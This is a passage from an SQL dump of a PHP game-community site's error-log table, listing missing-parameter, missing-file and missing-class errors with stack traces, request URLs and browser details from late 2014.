/home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#6 {main}', '37.24.151.115', 0.028, '2014-11-07 00:48:20', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=page&group=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (138, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: id', '0f878356653b8ef967ef3d2ff13703cf181f2571', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 151, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 51, \'1\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.004, '2014-11-07 00:59:31', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=page&group=1&jscss=1', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (139, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: id Verifier: UINT', '83b6926ab2723e5eaa26e77364105142c4fa81e1', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 51, \'1\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.004, '2014-11-07 00:59:43', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=page&group=1&id=start&jscss=1', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (140, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 2; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=pagestates&group=1', 'c17c26f055a2acb764cd0e9d2dfe4a6abc4255ed', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.008, '2014-11-07 01:47:35', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pagestates&group=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (141, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: group Verifier: UINT', '160a45639d5241e98ff3b67e71757d6b56b2af57', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 51, \'1\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.092, '2014-11-07 02:48:38', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pages&group=undefined&id=wizard_details&jscss=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 10, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (142, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=page&group=1&jscss=1', 'c8ef5a49caa67b05543b0f77eb587a5a2c43e099', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.008, '2014-11-07 02:53:16', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=page&group=1&jscss=1', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (143, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=page&group=1&id=start&jscss=1', '28fc2962444a9cfad7faa8ee74c1154531e79a90', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.004, '2014-11-07 02:53:28', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=page&group=1&id=start&jscss=1', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (144, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'${char_race}_${char_gender}.png\' found.', '8dcffe320b85fdfe58a135debbfd7128aa35e08f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'${char_race}_${...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'${char_race}_${...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.132, '2014-11-07 05:15:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=${char_race}_${char_gender}.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/?page=wizard_toolbar&last=start&next=wizard_visuals', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (145, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 0; url: /web/mojotrollz/api.php?call=pages&group=1&id=wizard_details&jscss=1', 'a5f44a6d3ecfe60ab7a8a85ee5f3170b4908d124', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.056, '2014-11-07 15:52:18', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pages&group=1&id=wizard_details&jscss=1', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (146, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'system.js\' found.', '3fb99fda364ed20cfb362063a032344b4dc438af', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'sys\', \'system.js\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'sys\', \'system.js\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.084, '2014-11-07 16:51:38', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (147, 'SYSTEM\\LOG\\ERROR', 'Class not found: user_news', '8ca750062bb77602dd1c08339e93d52cba99e9c0', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'user_news\')\n#1 [internal function]: spl_autoload_call(\'user_news\')\n#2 /home/web/webdir/mojotrollz/system/page/State.php(11): method_exists(\'user_news\', \'css\')\n#3 /home/web/webdir/mojotrollz/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'2\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'2\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#7 {main}', '37.24.151.115', 0.12801, '2014-11-07 17:53:24', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pages&group=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (148, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'nightelf_male.png\' found.', 'c674d697cca80c06a529d4b7a985f8787a204b8a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'nightelf_male.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'nightelf_male.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.056, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=nightelf_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (149, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'default_start\' found.', '98e2b5b706543141eccc4c21cd57d6dffb5f058a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'button.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'button.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.22001, '2014-12-19 03:05:53', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=button.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 39, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (150, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'help_gnome.png\' found.', '32b43b59991a0659c0dec2ea9ccc383f060b180d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'help_gnome.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'help_gnome.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.004, '2014-12-06 18:25:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=help_gnome.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 7, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (151, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_tops_l.png\' found.', '3d35fd7962d6ddd874586a0781a9956e5587fbaa', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_tops_l.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_tops_l.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.008, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_tops_l.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (152, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_tops_m.png\' found.', '2bb3384d8cbdcbe8a95d6bfcdacd6e804782e144', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_tops_m.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_tops_m.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.028, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_tops_m.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (153, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_rights.png\' found.', '3168ff4ec0e7be6fb770a35c18ae4fa576d8483b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_rights.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_rights.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.024, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_rights.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (154, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_tops_r.png\' found.', '01df2fe1a6b4fbf113b1839faa3f33533d83455c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_tops_r.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_tops_r.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.02, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_tops_r.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (155, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_lefts.png\' found.', 'd9277adb6ec51ff3a711a61963463feeb74094c7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_lefts.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_lefts.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.008, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_lefts.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (156, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_bots_l.png\' found.', 'f377fe4f67011e14d9defd780d929fd97cbbfaf4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_bots_l.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_bots_l.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.004, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_bots_l.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (157, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_bots_m.png\' found.', 'ebcdf17d1cb0c5f4e84c3b040ee1fcc37fd0487b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_bots_m.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_bots_m.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.004, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_bots_m.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (158, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'border_bots_r.png\' found.', '6a78cceff351761290630a99c8b25875950840ca', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_start\', \'border_bots_r.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_start\', \'border_bots_r.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.151.115', 0.004, '2014-11-08 17:57:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_start&id=border_bots_r.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, 